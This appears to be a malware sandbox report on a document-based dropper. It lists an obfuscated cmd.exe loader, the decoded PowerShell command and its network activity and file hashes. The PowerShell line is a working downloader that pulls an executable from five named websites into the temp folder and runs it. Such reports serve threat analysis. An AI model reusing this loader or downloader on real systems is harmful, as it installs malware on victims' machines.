_-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "
C:\Windows\system32\cmd.exe
cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ \\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $hLj=new-object Net.WebClient;$hVO='http://baominhonline.com/EnM0X@http://craquesdoradio.com.br/wp-includes/random_compat/aK@http://csubiz.us/oeh@http://ccoolmedia.com/P6fi1X6@http://casellamoving.com/MPOK64SC'.Split('@');$cJF = '974';$wsi=$env:temp+'\'+$cJF+'.exe';foreach($AWz in $hVO){try{$hLj.DownloadFile($AWz, $wsi);Start-Process $wsi;break;}catch{}}
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4332,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | baominhonline.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | craquesdoradio.com.br | udp |
| US | 8.8.8.8:53 | csubiz.us | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.161:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ccoolmedia.com | udp |
| US | 8.8.8.8:53 | casellamoving.com | udp |
| US | 76.223.105.230:80 | casellamoving.com | tcp |
| US | 8.8.8.8:53 | 161.61.62.23.in-addr.arpa | udp |
| US | 76.223.105.230:443 | casellamoving.com | tcp |
| US | 8.8.8.8:53 | 230.105.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| NL | 23.62.61.184:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 184.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
Files
memory/1400-4-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-2-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-7-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-6-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-5-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-3-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-1-0x00007FFDF258D000-0x00007FFDF258E000-memory.dmp
memory/1400-0-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-8-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-9-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-10-0x00007FFDAFC40000-0x00007FFDAFC50000-memory.dmp
memory/1400-11-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-14-0x00007FFDAFC40000-0x00007FFDAFC50000-memory.dmp
memory/1400-13-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-12-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-33-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-42-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-41-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-44-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-45-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-47-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-46-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-40-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-43-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/3956-51-0x00000257F8390000-0x00000257F83B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqw43bwr.4uu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1400-68-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCD27E0.tmp\gb.xsl
| MD5 | 51d32ee5bc7ab811041f799652d26e04 |
| SHA1 | 412193006aa3ef19e0a57e16acf86b830993024a |
| SHA256 | 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97 |
| SHA512 | 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810 |
memory/1400-537-0x00007FFDF258D000-0x00007FFDF258E000-memory.dmp
memory/1400-538-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-548-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-549-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-550-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-551-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-570-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-571-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-572-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-569-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-573-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp